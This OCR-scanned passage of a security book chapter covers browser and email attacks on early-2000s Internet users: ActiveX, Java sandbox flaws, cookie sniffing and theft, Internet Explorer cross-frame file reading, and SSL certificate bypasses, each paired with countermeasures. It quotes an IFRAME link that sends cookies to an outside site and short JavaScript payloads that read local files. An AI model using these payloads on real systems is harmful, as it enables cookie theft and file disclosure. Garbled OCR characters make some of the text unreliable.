fhaf use Office macros fo carry ouf fheir dirfy work. Sef Macro profecfion fo High under 
Tools I Macro I Securify in Office 2000. (Each applicafion musf be configured as such; 
fhere is no global setting for all.) 

The fhird and mosf effecfive counfermeasure is fo resfricf or disable ActiveX. We'll 
discuss how this is done in the section on security zones shortly. But first, we need to 
highlight one more vulnerability that uses ActiveX. 

Erom a developer's perspective, don't write safe-for-scripting controls that could per- 
form privileged actions on a user's system. Unless, of course, you wanf fo end up in 
Georgi Guninski's nexf advisory. 




Once instantiated, ActiveX controis remain in memory untii unioaded. To unioad ActiveX controis, use 
regsvr32 /u [Control_Name] from a command iine. 



9 ' Active Setup File Download Vulnerability 



Popularity: 


5 


Simplicity: 


8 


Impact: 


5 


Risk Rating: 


6 



Juan Garlos Garcia Guarfango, an independent securify researcher with a penchant 
for exposing Infernef Explorer issues, posted an advisory concerning this vulnerability to 
his site, http:/ /www.kriptopolis.com. The "Active Setup Download" vulnerability is a 
denial of service (DoS) attack that exploits an ActiveX control used for Active Setup to 
download signed Microsoft .GAB files to any specified location on disk, even if that loca- 
tion overwrites another file. 
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O Active Setup DoS Countermeasure 

Microsoft has patched this one, at http:/ /www.microsoft.com/technet/security /bulletin/ 
MS00-042.asp. 




For Windows 2000 users, Windows Fiie Protection (WFP) can prevent the overwriting of certain sys- 
tem fiies if they are targeted by an expioit based on this Active Setup vuinerabiiity. 



O Using Security Zones Wisely: 

A General Solution to the Challenge of ActiveX 

By this point, many in our audience may be convinced that ActiveX is the bane of Internet 
client security. This sentiment ignores a basic premise: the more powerful and wide- 
spread a technology becomes, the greater the potential that it can be subverted to vast 
damaging effect. ActiveX is a powerful and popular technology; therefore, very bad 
things can happen when it is used with malice. (Wait until you read the upcoming section 
on email hacking.) End users are always looking for more automated ways of conducting 
their daily routines, and ActiveX is just one response to this need. Closing our eyes and 
hoping the problem will go away is not the answer — ^new technologies are waiting just 
over the horizon that will probably perform in much the same marmer. 

A general solution to the challenge presented by ActiveX (whether based on "safe for 
scripting" or not) is to restrict its ability to exert privileged control over your system. To 
do this properly requires some understanding of one of the most overlooked aspects of 
Windows security, security zones. Yes, to improve the security of your system, you have to 
learn how to operate it safely. Essentially, the zone security model allows users to assign 
varying levels of trust to code downloaded from any of four zones: Local Intranet, Trusted 
Sites, Internet, and Restricted Sites. A fifth zone, called Local Machine, exists, but it is not 
available in the user interface because it is only configurable using the IE Administration 
Kit (lEAK, see http:/ / www.microsoft.com/windows/ieak/en/default.asp). 



TIP 



One of the best references for learning about security zones is Microsoft Knowledge Base Article 
01 74360, available at http://support.microsoft.com. 



Sites can be manually added to every zone except the Internet zone. The Internet zone 
contains all sites not mapped to any other zone, and any site containing a period (.) in its 
URL. (Eor example, http: / / local is part of the Local Intranet zone by default, while 
http:/ /www.microsoft.com is in the Internet zone because it has periods in its name.) 
When you visit a site within a zone, the specific security settings for that zone apply to 
your activities on that site. (Eor example, "Run ActiveX controls" may be allowed.) 
Therefore, the most important zone to configure is the Internet zone, since it contains all 
the sites a user is likely to visit by default. Of course, if you manually add sites to any 
other zone, this rule doesn't apply. Be sure to carefully select trusted and untrusted sites 
when populating the other zones — if you choose to do so at all. (Tyq^ically, other zones 
will be populated by network administrators for corporate LAN users.) 
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To configure security for the Internet zone, open Tools I Internet Options I Security 
within IE (or the Internet Options control panel), highlight the Internet zone, click Default 
Level, and move the slider up to an appropriate point. We recommend setting it to High 
and then using the Custom Level button to manually go back and disable all other active 
content, plus a few other usability tweaks, as shown in Table 16-1. 

The setting to disable ActiveX is shown in Figure 16-1. 

The bad news is that disabling ActiveX may result in problems viewing sites that de- 
pend on controls for special effects. In the early days of the Web, many sites depended 
heavily on downloaded code like ActiveX controls to achieve dynamic functionality, but 
this paradigm has largely been replaced by extensions to HTML and server-side script- 
ing, thank goodness. Thus, disabling ActiveX doesn't wreck the user experience at major 
web sites like it once did. One highly visible exception is sites that use Macromedia's 
Shockwave ActiveX control. With ActiveX disabled, viewing sites that use the Shock- 
wave ActiveX control brings up the following message: 




If you want to get all that slick soimd and animation from Shockwave, you'll have to 
enable ActiveX (imless, of course, you use Netscape's browser, where Shockwave comes 
in the form of a plug-in). Another ActiveX-oriented site that most users will likely visit is 



Category 


Setting Name 


Recommended Setting 


Comment 


ActiveX controls Script ActiveX controls 


Disable 


Client-resident 


and plug-ins marked "safe for 




"safe" controls can 




scripting" 




be exploited. 


Cookies 


Allow per-session 


Enable 


Less secure but 




cookies (not stored) 




more user friendly. 


Downloads 


File download 


Enable 


IE will 








automatically 
prompt for 
dowload based on 
the file extension. 


Scripting 


Active scripting 


Enable 


Less secure but 
more user friendly. 


Table 16-1. 


Recommended Internet Zone Security Settings (Custom Levei Settings Made After 




Setting Defauit to High) 
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Internet Properties 



General Security j Content | Connections! Advanced) 

Select a Web content zone to specify its security settings. 



« '•! O O 



I nter net Local intranet T rusted sites 



Restricted 

sites 



9 



Internet 

This zone contains all Web sites you 
haven't placed in other zones 



Sites... 



r Security] 



Security Settings 



J 



Settings; 

O Prompt 3 

Initialize and script ActiveX controls not marked as safe 
0 Disable 
O Enable 
O Prompt 
Run ActiveX controls and plug-ins 
O Administrator approved 
0 Disable 
O Enable 
O Prompt 

§] Script ActiveX controls marked safe for scripting 
0 Disable 
O Enable 

O Prnmni ^li 



•Reset custom settings- 
Reset to; 



OK 



Cancel 



Figure 1 6-1 . Disabling all ActiveX settings using the Internet Options control panel will protect 
against malicious controls downloaded via hostile web pages. 



Microsoft's Windows Update (WU), which uses ActiveX to scan the user's machine and 
to download and install appropriate patches. WU is a great idea — it saves huge amounts 
of time ferreting out individual patches (especially security ones!) and automatically de- 
termines if you already have the correct version. However, we don't think this one conve- 
nient site is justification for leaving ActiveX enabled all the time. Even more frustrating, 
when Active scripting is disabled under IE, the autosearch mechanism that leads the 
browser from a typed-in address like "mp3" to http:/ /www.mp3.com does not work. 

One solution to this problem is to manually enable ActiveX when visiting a trusted 
site and then to manually shut it off again. The smarter thing to do is to use the Trusted 
Sites security zone. Assign a lower level of security (we recommend Medium) to this 
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zone, and add trusted sites like WU (windowsupdate.microsoft.com) to it. This way, 
when visiting WU, the weaker security settings apply, and the site's ActiveX features still 
work. Similarly, adding auto.search.msn.com to Trusted Sites will allow security to be set 
appropriately to allow searches from fhe address bar. Aren'f securify zones convenienf ? 



CAIJTIOiV 



Be very careful to assign only highly trusted sites to the Trusted Sites zone, as there will be fewer re- 
strictions on active content downloaded and run by them. Be aware that even respectable-looking sites 
may have been compromised by malicious hackers or might just have one rogue developer who’s out 
to harvest user data (or worse). 



You can also assign zone-like behavior to Outlook/Outlook Express (OE) for purposes 
of reading mail securely. With Outlook/OE, you select which zone you want to apply to 
content displayed in the mail reader, either the Internet zone or the Restricted Sites zone. Of 
course, we recommend setting it to Restricted Sites. (The new Outlook 2000 Security Up- 
date does this for you.) Make sure that the Restricted Sites zone is configured to disable all 
active content! This means set it to High, and then use the Custom Level button to go back 
and manually disable everything that High leaves open. (Or set them to high safety if dis- 
able is not available.) Eigure 16-2 shows how to configure Outlook for Restricted Sites. 




Figure 1 6-2. Configuring Outlook to use the Restricted Sites zone when browsing. 
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As with IE, the same drawbacks exist to setting Outlook to the most restrictive level. 
However, active content is more of an armoyance when it comes in the form of an email 
message, and fhe dangers of inferprefing if far oufweigh fhe aesfhefic benefifs. If you 
don'f believe us, read on. The greaf fhing abouf securify zones is fhaf you can sef Ouflook 
fo behave more conservatively fhan your web browser can. Flexibilify equafes fo higher 
securify, if you know how fo configure your soffware righf. 

Java Security Holes 

One fine day in fhe 1990s, Sun Microsysfems decided fo creafe a programming paradigm 
fhaf addressed many of fhe problems soffware wrifers had faced since fhe early days of 
compufing. The oufcome of fheir efforf was dubbed Java, and if incidenfally solved a lof 
of fradifional securify problems for programmers as well. Based largely on fhe idea fhaf if 
was designed from fhe ground up fo be bullefproof (and some pofenf marketing by Sun), 
mosf people believe fhaf Java is 100 percenf secure. Of course, fhis is impossible. Java 
does raise fhe bar of securify in some inferesfing ways, however. (The following discus- 
sion perfains fo fhe Java 2, or JDK 1.2, archifecfure, which was currenf af fhis wrifing.) 

Java is a carefully designed language fhaf resfrains programmers from making many 
of fhe misfakes fhaf lead fo securify problems, such as buffer overflows. Sfrong f 5 q?ing of 
fhe language is enforced af compile and also af execufion fime by fhe Java Virfual Ma- 
chine (JVM) and ifs builf-in byfecode verifier, which profecfs fhe areas in memory fhaf 
programs can access. The Java language also does nof direcfly supporf accessing or ma- 
nipulafing memory addresses by means of "poinfers," which allow programmers fo pro- 
grammatically guess where fo inserf commands info rurming code. 

Nexf, fhe JVM has a builf-in Securify Manager fhaf enforces access confrol over sysfem 
resources based on a user-definable securify policy. Togefher wifh 1)^)0 verification, fhese 
concepfs make up fhe "sandbox" fhaf resfrains Java code from performing privileged ac- 
tions wifhouf fhe user's explicif consenf. On fop of all fhis, Java implemenfs code signing fo 
presenf more evidence abouf fhe frusfworfhiness of foreign code. Users can decide fo rim 
code or nof, based on whefher fhey fmsf fhe signafure, much like Aufhenficode. 

Finally, fhe Java specification has been made public and is available for anyone fo 
scrutinize af hffp:/ /java.sun.com. Osfensibly, fhis opermess fo crificism and analysis 
provides some Darwinian selecfion againsf weaknesses in fhe design. 

In fheory, fhese mechanisms are exfremely difficulf fo circumvenf. (In facf, many 
have been formally proven fo be safe.) In practice, however, Java securify has been bro- 
ken numerous fimes because of fhe age-old problem of implemenfafion nof supporfing 
fhe design principles. For a good overview of fhe history of Java securify from a 
real-world perspective, see fhe Princefon Universify Secure Infemef Programming (SIP) 
page af hffp:/ / www.cs.princefon.edu / sip /hisfory/ index.phpS. We will discuss some of 
fhe major recenf Java implemenfafion issues mosf relevanf fo clienf-side users nexf. 



xoTii; 



For the definitive background on Java security, see the Java Security FAQ at http://java.sun.com/sfaq/ 
index.htmi. 
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Netscape Communicator JVM Bugs 



Popularity: 


4 


Simplicity: 


1 


Impact: 


7 


Risk Rating: 


4 



In April 1999, Karsten Sohr at the University of Marburg in Germany discovered a 
flaw in an essential security component of Netscape Communicator's JVM. Under some 
circumstances, the JVM failed to check all the code that is loaded into the JVM. Exploiting 
the flaw allowed an attacker to run code that breaks Java's type-safety mechanisms in 
what is called a type confusion attack. This is a classic example of the implementation vs. 
design issue noted earlier. 

Q Disabling Java in Netscape 

Upgrade to the newest version of Netscape, or disable Java as follows (shown in Figure 16-3) : 

1. In Communicator, select Edit I Preferences. 

2. In fhe Preferences dialog box, choose the Advanced category. 

3. Clear the Enable Java check box in the dialog box. 

4. Click OK. 



We think leaving JavaScript turned on is okay, and it is so heavily used by web sites to- 
day that disabling it is probably impractical. However, we strongly recommend dis- 
abling JavaScript in Netscape's Mail and News clients, as shown in Figure 16-3. See 
http:/ / www.netscape.com/security /notes/ sohrjava.html for more defails. 




IVlicrosoft Java Sandbox Flaw 



Popularity: 


4 


Simplicity: 


1 


Impact: 


7 


Risk Rating: 


4 



Microsoft's IE was bitten by a similar bug shorfly afterward. Due to flaws in the 
sandbox implementation in Microsoft's JVM, Java security mechanisms could be circum- 
vented entirely by a maliciously programmed applet hosted by a remote web server or 
embedded in an HTML-formatted email message. 
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Figure 1 6-3. Disable Java in Netscape Communicator to protect against malicious Java applets. 
JavaScript is safer, but should be disabled for Mail and News as shown. 



Q Microsoft IE Fixes 

To see if you're vulnerable, open a command prompt and t 5 ^e jview. Check the build 
number (last four digits of the version number), and see where in the following categories 
it falls: 



Version 


Status 


1520 or lower 


Not affected by vulnerability 


2000-2438 


Affected by vulnerability 


3000-3167 


Affected by vulnerability 



Don't be surprised if jview shows you to be vulnerable even if IE is not installed. Several 
other products, such as Microsoft Visual Studio, install the JVM. We were surprised to 
find that we were rurming a vulnerable version of the JVM while writing this passage, in- 
stalled with IE 5.0 nearly one year after the release of the patch! 
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The patch is called the Virtual Machine Sandbox fix, available on the main IE patch 
list at http: / / www.microsoft.com / windows /ie/ download / default.htm. You may even 
consider disabling Java entirely for ulfimafe securify, alfhough your experience wifh fhe 
Web may be mufed when visifing fhose sifes fhaf use Java applefs. (Applefs are clienf- 
side Java programs.) To disable Java in IE, follow fhe procedure ouflined in fhe section on 
IE securify zones earlier, and make sure fo manually disable any settings fhaf reference 
Java in addifion fo setting securify of fhe Infemef zone fo High. 




^rown Orifice— More Java Bugs 



Popularity: 


7 


Simplicity: 


5 


Impact: 


3 


Risk Rating: 


5 



During summer 2000, Dan Brumleve announced he had discovered fwo flaws in 
Nefscape Communicafor's implemenfafion of Java. Specifically, he identified issues 
wifh Nefscape's Java class file libraries fhaf failed fo perform fhe proper securify checks 
when performing sensifive acfions or ignored fhe resulfs of fhe checks. The classes in 
question included fhe java.nef .ServerSockef class, which creafes lisfening nefwork sock- 
efs on which fo accepf nefwork cormecfions, and fhe nefscape.nef.URLCormecfion and 
nefscape.nef .URLInpufSfeam classes, which absfracf sfandard Java mefhods fo read local 
files. In all fhree insfances, fhese classes confained mefhods fhaf failed fo invoke fhe ap- 
propriafe SecurifyManager.check mefhod fo defermine if an applef indeed had permis- 
sions fo perform fhese acfions, or ignored fhe resulfing exception if fhe check failed. 

Exploiting fhese flaws in combinafion is achieved by writing a Java applef fhaf calls 
fhese mefhods fo creafe a lisfening porf and fo enable read access fo fhe file sysfem. Dan 
wrofe fhe required Java code and hosfed if on his sife as a proof-of-concepf example of 
how fhe vulnerabilifies could be used fo attack casual browsers of fhe Infemef. He sef up 
a simple form fhaf allowed users fo selecf whaf directory fhey wanted fo share ouf and 
whaf porf fhey wanted fo lisfen on. This informafion was POSTed fo a Perl CGI scrip! fhaf 
invoked Dan's custom Java classes fo share ouf fhe specified folder and fo creafe fhe lis- 
fening porf linked fo if on fhe clienf side. 

Showing his sense of humor, Dan promoted fhe Napsfer-like feafures of fhis fech- 
nique fo allow users fo share files via fhe peer-fo-peer nefwork creafed by millions of us- 
ers sharing ouf fheir drives over HTTP. In all seriousness, fhough, fhis problem should 
nof be downplayed simply because if only allows read access fo dafa. Dan's exploif is 
quife generous, allowing users fo specify whaf direcfory fhey wish fo share. Malicious ap- 
plefs could work much more sfealfhily, exposing anyone who uses Nefscape fo possible 
disclosure of sensifive informafion. 

Q Brown Orifice Countermeasures 

As usual, fhe only real way fo be secure from malicious Java applefs is fo disable Java in 
your web browser. The procedure for Nefscape is described earlier in fhe section "Dis- 
abling Java in Nefscape" and in Pigure 16-3. We recommend fhis setting for Nefscape users. 
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Netscape has provided no specific fixes af fhis wrifing according fo hffp: / / 
www.nefscape.com / securify / nofes / index.hfml. This vulnerabilify af fecfs Commrmicafor 
versions 4.0 fhrough 4.74 on Windows, Macintosh, and UNIX operafing systems. This vul- 
nerabilify does nof affecf Nefscape 6 Preview Release 1 or Preview Release 2. 

Beware the Cookie Monster 

Ever wonder how some web sites personalize your visifs, like remembering fhe confenfs of 
a shopping carf or maybe a preferred shipping mefhod automatically filled info a form? 
The protocol fhaf imderlies fhe World Wide Web, HTTP, does nof have a facilify for frack- 
ing fhings from one visif fo anofher, so an extension was rigged up fo allow if fo mainfain 
such "sfafe" across HTTP requesfs and responses. The mechanism, described in RFC 2109, 
sefs cookies, or special tokens confained wifhin HTTP requesfs and responses fhaf allow 
web sites fo remember who you are from visif fo visif. Cookies can be sef per session, in 
which case fhey remain in volatile memory and expire when fhe browser is closed or ac- 
cording fo a sef expiration time. Or fhey can be persistent, residing as a fexf file on fhe user's 
hard drive, usually in a folder called "Cookies." (This is fypically %windir%\ Cookies un- 
der Win9x or %userprofile%\ Cookies under NT /2000.) As you mighf imagine, attackers 
who can lay fheir hands on your cookies mighf be able fo spoof your online identify or 
glean sensitive information cached wifhin cookies. Read on fo see how easy if can be. 



9 Cookie Snarfing 



Popularity: 


7 


Simplicity: 


5 


Impact: 


2 


Risk Rating: 


5 



The bmfe force way fo hijack cookies is fo sniff fhem off fhe nefwork and fhen replay 
fhem fo fhe server. Any oT packef capfure fool can perform fhis dufy, buf one of fhe beffer 
ones for cookie snarfing is SpyNef/PeepNef by Laurenfiu Nicula. (Search fhe archives af 
hffp: / / www.packefsformsecurify.com / fo find fhis gem.) SpyNef is fwo fools fhaf acf in 
concerf: fhe CapfureNef program performs fhe acfual packef capfure and saves fhem fo 
disk, and fhe PeepNef fool opens fhe capfure file fo reconsfrucf fhe sessions in hu- 
man-legible form. PeepNef can acfually replay a web-browsing session jusf as if you were 
fhe user being monifored. The following example is a snippef from a PeepNef reconsfruc- 
fion of a session fhaf uses cookie aufhenficafion fo confrol access fo personalized page 
views. (Names have been changed fo profecf fhe irmocenf.) 

GET http://www.victim.net/images/logo.gif HTTP/1.0 
Accept: */* 

Ref err er : http : / / www . victim . net/ 

Host : WWW . victim . net 

Cookie : jrunsessionid=9 611402 42 7 8141 622; cuid=TORPMlZXTFRLRlpWTVFISEblahblah 
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You can plainly see the cookie token supplied in this HTTP request sent to the server. 
The relevant portion is "cuid=", which denotes a unique identifier used to authenticate 
this user of fhe sife www.vicfim.nef. Lef's say fhe affackers now visif vicfim.nef, creafe 
fheir own login ID, and receive fheir own cookie. If jusf so happens fhaf vicfim.nef sefs 
persisfenf cookies fhaf are wriffen fo files on disk (as opposed fo per-session cookies 
stored in volafile memory). Affackers can open fheir own cookie and replace fhe "cuid=" 
enfry wifh fhe one fhey sniffed. Upon logging back in fo vicfim.nef, fhe affackers are now 
masquerading as fhe original cusfomer. 

PeepNef's abilify fo replay an entire session or fo selecf portions of if makes fhis fype 
of attack much easier. By use of fhe Go Gef If! buffon, fhe acfual pages viewed by a user 
can be refrieved, using fhe same cookie snarfed earlier by GapfureNef. Figure 16-4 illus- 
frafes PeepNef displaying someone's completed orders using fheir aufhenficafion cookie 
sniffed by GapfureNef. (See fhe lower-righf frame following fhe "Gookie:" nofafion — 
fhese are fhe session and aufhenficafion cookies, respectively.) 




Figure 1 6-4. A cookie recorded by CaptureNet and played back in PeepNet 













Chapter 16: Hacking the Internet User 



653 



This is a pretty nifty trick. CaptureNet can also present a full decode of recorded fraf- 
fic fhaf's nearly equivalenf fo fhe oufpuf of professional-level profocol analysis fools like 
Nefwork Associafes, Inc.'s SnifferPro. Even better, SpyNef is free! 

O Countermeasures: Cookie Cutters 

Be wary of sifes fhaf use cookies for aufhenficafion and sforage of sensifive personal 
dafa. One fool fo help in fhis regard is Cookie Pal from Kookaburra Software af 
hffp: / / www.kburra.com/ cpal.hfml. If can be sef fo warn you when web sifes affempf fo 
sef cookies, enabling you fo see whaf's going on behind fhe scenes so you can decide 
whefher you wanf fo allow such acfivify. Microsoft's Infemef Explorer has a builf-in 
cookie screening feafure, available under fhe Infemef Options confrol panel, Securify fab, 
Infemef Zone, Cusfom Level, "Prompf" for persisfenf and per-session cookies. Nefscape 
browser cookie behavior is sef via Edif I Preferences I Advanced, and checking eifher 
Warn Me Before Accepfing A Cookie or Disable Cookies (see Pigure 16-3). Eor fhose cook- 
ies fhaf you do accepf, check fhem ouf if fhey are written fo disk, and see if fhe sife is stor- 
ing any personal information abouf you. 

Also remember, if you visif a sife fhaf uses cookies for aufhenficafion, fhey should af 
leasf use SSL fo encr 5 q)f fhe inifial posf of your username and password so fhaf if doesn'f 
jusf show up as plainfexf in PeepNef. 

We'd prefer fo disable cookies oufrighf, buf many of fhe sifes we frequenf often re- 
quire fhem fo be enabled. Eor example, Microsoft's wildly popular Hofmail service re- 
quires cookies fo be enabled in order fo log in. Because Hofmail rofafes among various 
aufhenficafion servers, if isn'f easy jusf fo add Hofmail fo fhe Trusted Sifes zone under 
Infemef Opfions (as we describe in fhe earlier section, "Using Securify Zones Wisely"). 
You could use fhe *.hofmail.com nofafion fo help ouf here. Cookies are an imperfecf solu- 
tion fo inadequacies in HTTP, buf fhe alternatives are probably much worse (for example, 
appending an identifier fo URLs fhaf may be sfored on proxies). Until someone comes up 
wifh a beffer idea, monitoring cookies using fhe fools referenced earlier is fhe only solution. 



9 ' Cookie Stealing via Malicious URL 



Popularity: 


5 


Simplicity: 


8 


Impact: 


2 


Risk Rating: 


5 



Here's a scary fhoughf : IE users clicking a purposely crafted URL are pofenfially vul- 
nerable fo having fheir cookies revealed. Bermeff Haselfon and Jamie McCarfhy of 
Peacefire have posted a scripf af hffp://www.peacefire.org/securify/iecookies fhaf 
makes fhis fhoughf a realify. If extracfs cookies from fhe clienf machine simply by click- 
ing a link wifhin fhis page. The confenfs of cookies residing on fhe user's machine are 
readable by fhis scripf, and fhus are accessible fo web sife operafors. 

This can also be used fo nasfy effecf when senf wifhin inline frame (IPRAME) fags em- 
bedded in HTML on a web page (or in HTML-formaffed email messages or newsgroup 
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posts). The following example suggested by Internet security consultant Richard M. 
Smith points out how IFRAME could be used in conjunction with the Peacefire exploit to 
steal cookies: 

<i frame src="http : / / www . peacefire .org%2fsecurity%2fiecookies%2f 
showcookie . html%3f .yahoo . com/ "></if rame> 

A malicious email message that included many such embedded links could grab 
cookies on the user's hard drive and return them to the peacefire.org site operators. For- 
tunately, the Peacefire gang seem like nice folk — ^but do you really want them to have all 
that potentially revealing data? 

O Closing the Open Cookie Jar 

Obtain and apply the patch referenced at http://www.microsoft.com/technet/security/ 
bulletin/ms00-033.asp. Alternatively, cookies can be monitored using Cookie Pal or IE's 
built-in functionality, as described earlier. 



Internet Explorer HTML Frame Vulnerabilities 

A little-known feature of Microsoft's Internet Explorer is the "cross-domain security 
model." A good description of this concept is provided at http: / /www.microsoft.com/ 
technet /security /bulletin/ fq00-009.asp. In a nutshell, the model works invisibly to pre- 
vent browser windows created by one web site (the simplest form of an IE "domain") 
from reading, accessing, or otherwise interfering with data in another site's window. A 
corollary of this model is that HTML frames opened within a window should only be ac- 
cessible by the parent window if they are in the same domain. 

What makes this model interesting is that the local file system is also considered a do- 
main under IE. Thus, a mechanism that somehow violates the cross-domain security 
model would open up many doors for malicious web site operators to view data not only 
from other sites visited by users, but even files on their own hard drive. 

Some of these problems are trivially exploitable by use of a few lines of code on a mali- 
cious web site or by sending them in an email message. Some of the more prominent ex- 
ploits are discussed next. 



# Using 



IFRAME and IE document.execCommand 



Popularity: 


5 


Simplicity: 


6 


Impact: 


7 


Risk Rating: 


6 



to Read Other Domains 



Browser security guru Georgi Guninski has identified several instances where 
IE cross-domain security breaks down. (See his Internet Explorer page at http:/ / 
www.guninski.com /browsers.htmlwww.guninski.com / .) 
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In exploiting these problems, Georgi often leverages the IFRAME tag, mentioned ear- 
lier. IFRAME is an extension to HTML 4.0. Unlike the standard HTML FRAME tag, 
IFRAME creates a floating frame fhaf sifs in fhe middle of a regular nonframed web page, 
jusf like an embedded image. If's a relatively unobfrusive way of inserting confenf from 
ofher sifes (or even fhe local file sysfem) wifhin a web page and is well suifed fo accessing 
dafa from ofher domains surrepfifiously. 

This particular exploif is a greaf example of his fechnique. If uses an IFRAME wifh 
source sef equal fo a local file and fhen injecfs JavaScripf info fhe IFRAME, which fhen exe- 
cutes wifhin fhe local file-sysfem domain. If fhe injecfed JavaScripf confains code similar fo 

IFRAME . focus ( ) ; document . execCommand ( " command_name" ) 



fhen command_name will be execufed wifhin fhe IFRAME in fhe confexf of fhe local ma- 
chine's domain. If malicious web sife operators knew (or could guess) fhe name and loca- 
tion of a file, fhey could view any file f 5 ipe fhaf can be opened in a browser window. A file 
like wirmfX repair \sam._ carmof be read — if acfivafes IE's file download dialog box. 
Georgi has posfed sample code fhaf will read fhe file G:\fesf.fxf if if exisfs on fhe user's 
drive. If is available af hffp:/ / www.guninski.com/execc.hfmlwww.guninski.com/. 

Q Countermeasure to IFRAME and document.execCommand 

Apply fhe pafch available af hffp:/ / www.microsoff.com/fechnef/securify/bullefin/ 
ms99-042.asp. Alternatively, you could disable Active Scripfing by using fhe same mech- 
anism discussed in the earlier section on security zones. 



1E Frame Domain Verification 



Popularity: 


5 


Simplicity: 


6 


Impact: 


7 


Risk Rating: 


6 



Andrew Nosenko of Mead & Gompany reporfed in June 2000 fhaf fwo funcfions 
wifhin IE do nof perform proper checking of domain membership, allowing a mali- 
ciously craffed HTML page fo open a frame confaining a local file and read if (see 
hffp://www.nfsecurify.nef/go/loader.asp?iD=/securify/ie5-17.hfm). Nof fo be ouf- 
done, Georgi Guninski posfed a similar vulnerabilify on his sife. Georgi's code is decep- 
fively simple: 

<IFRAME ID = "I1"X/IFRAME> 

<SCRIPT for=Il event="NavigateComplete2 (b) " > 

alert ("Here is your file : \n"+b . document . body . innerText ) ; 

</SCRIPT> 

<SCRIPT> 
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II . navigate ("file://c:/test.txt") ; 

set Timeout ('ll. navigate ("file://c:/test.txt") ',1000) ; 

</SCRIPT> 

Once again, he has targeted a test file. But he could just as easily have read any browser- 
visible file on the user's system by simply making appropriate adjustments to the "file: / / 
c:/test.txt" line. 

Q Countermeasure for Frame Domain Verification 

Apply the patch available via http:/ / www.microsoft.com/technet/ security /bulletin/ 
fq00-033.asp. Again, disabling Active Scripting would be an alternative work-around 
that would severely limit the functionality of web sites that relied heavily on it. (See the 
discussion of security zones earlier.) 



SSL FRAUD 



SSL is the protocol over which the majority of secure e-commerce transactions occur on 
the Internet today. It is based on public-key cr 5 q)tography, which can be a bit intimidat- 
ing to the novice, but it is a critical concept to understand for anyone who buys and sells 
fhings in the modem economy. A good overview of how SSL works is available at http: / / 
home.netscape.com/ security/ techbriefs / ssl.html. 

SSL is a security specification, however, and as such it is open to interpretation by 
those who implement it in their software products. As we've see earlier, many slips can 
take place betwixt the cup and the lip — that is, implementation flaws can reduce the secu- 
rity of any specification to zero. We discuss just such an implementation flaw next. 

Before we do, a quick word of advice: readers should seek out the most powerful SSL 
encr 5 q)tion available for their web browser, 128-bit cipher strength. Thanks to the relax- 
ation of U.S. export laws, 128-bit versions of Netscape and IE are available to anyone in a 
country not on defined embargo lists. Under IE, open the About box for information on 
obtaining the 128-bit version. Eor Netscape users, check out the main download page at 
http:/ /home.netscape.com/download, and look for the 128-bit strong encr 5 q)tion label. 




Browser SSL Certificate Validation Bypass 



Popularity: 


3 


Simplicity: 


1 


Impact: 


6 


Risk Rating: 


3 



This issue involves the spoofing of a legitimate web site's SSL certificate, which 
would normally be invalidated by cross-checking the certificate's identity with the DNS 
name and IP address of fhe server at the other end of the cormection. This is according to 
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the SSL specification. However, the ACROS Security Team of Slovenia discovered an im- 
plemenfafion flaw wifh Nefscape Communicator versions released before 4.73. In fhese 
versions, when an exisfing SSL session was esfablished, Communicafor only compared 
fhe IP address, nof fhe DNS name, of a cerfificafe againsf exisfing SSL sessions. By surrep- 
titiously fooling a browser info opening an SSL session wifh a malicious web server fhaf 
was masquerading as a legifimafe one, all subsequenf SSL sessions fo fhe legifimafe web 
server would acfually be ferminafed on fhe rogue server, wifhouf any of fhe sfandard 
warnings presenfed fo fhe user. 

Yes, fhis is a brain fwisfer. For a more fhorough explanation, see fhe ACROS feam's 
original armouncemenf as relafed in CERT Advisory 2000-05 af hffp:/ /www.cerf.org/ 
advisories /CA-2000-05.hf ml (alfhough fheir example using Verisign and Thawfe confains 
oufdafed IP addresses). If's worfhwhile fo undersfand fhe impUcafions of fhis vulnerabil- 
ify, however, no matter how unlikely fhe alignmenf of variables fo make if work. Too many 
people fake for granted fhaf once fhe little SSL lock icon appears in fheir browser, fhey are 
free from worry. ACROS showed fhaf fhis is never fhe case as long as human beings have a 
hand in software development. 

A similar vulnerability was discovered by the ACROS team in IE, except that IE's 
problem was that it only checked whether the certificate was issued by a valid Certificate 
Authority, not bothering to also verify fhe server name or expirafion dafe. This only oc- 
curred when fhe SSL connecfion fo fhe SSL server was made via a frame or image (which 
is a sneaky way fo sef up inconspicuous SSL sessions fhaf users may nof nof ice). IE also 
failed fo revalidafe fhe cerfificafe if a new SSL session was esfablished wifh fhe same 
server during fhe same IE session. 

Q Web Browser SSL Fraud Countermeasure 

As indicated, upgrading fo Communicafor version 4.73 or higher alleviafes fhis 
problem. (Gef if af hffp://home.nefscape.com/download.) IE users should see hffp:// 
www.microsoff.com/ fechnef/securify/bullefin/ms00-039.asp for pafch information. 

Of course, fhe only way fo be certain that a site's certificate is legitimate is to manually 
check the server certificate presented to the browser. In either Netscape or IE, clicking the lit- 
tle lock icon in the lower part of fhe browser will perform fhis function. You can also gef af 
fhis information by clicking fhe Securify button on fhe Nefscape toolbar. In IE, clicking fhe 
lock icon will also work, or selecf Eile I Properties while visiting an SSL-profected page fo 
display certificate info. Pigure 16-5 shows IE displaying fhe cerfificafe for a popular web site. 

Two settings in IE will help users aufomafically verify if a server's SSL cerfificafe has 
been revoked. They are Check Por Server Cerfificafe Revocafion and Check Por Publisher 
Cerfificafe Revocafion under Tools I Infemef Options I Advanced I Securify. 

EMAIL HACKING 

Mosf people know fhe Infernef by ifs mosf visible inferface — fhe World Wide Web. How- 
ever, fhe volume of email senf daily on fhe Infemef probably exceeds fhe amounf of web 
fraftic. Email is fhus fhe single mosf effecfive avenue info fhe compufing space of fhe 
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Figure 1 6-5. A server’s SSL certificate is examined in IE. Make sure that this information is as 
expected when visiting SSL-ized servers. 



Internet user. Interestingly, it is the intersection of these two immensely popular Internet 
protocols, HTTP and SMTP, that increases the potential for danger astronomically: HTML- 
formatted email messages are just an effective vector of fhe many browser attacks we've 
discussed so far, and perhaps even more so. Add a healthy dose of mobile code technolo- 
gies embedded in email messages, and it's nearly child's play to exploit gullible users. 




Aithough we taik exciusiveiy about emaii in this section, cieariy these techniques are aiso appiicabie to 
messages posted to Internet newsgroups as well. Such tactics may even result in more widespread 
damage than spam attacks using these techniques. 



Mail Hacking 101 

Before we launch info a discussion of specific affacks, if is firsf helpful fo see how a ge- 
neric malicious mail message is sent. It's actually harder than you might think because 
most modern, graphical email clients do not allow direct manipulation of the Simple Mail 
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Transfer Protocol (SMTP) message header block. Ironically, for all the flak Microsoft 
takes regarding its vulnerability to such problems on the receiving end, it is extremely 
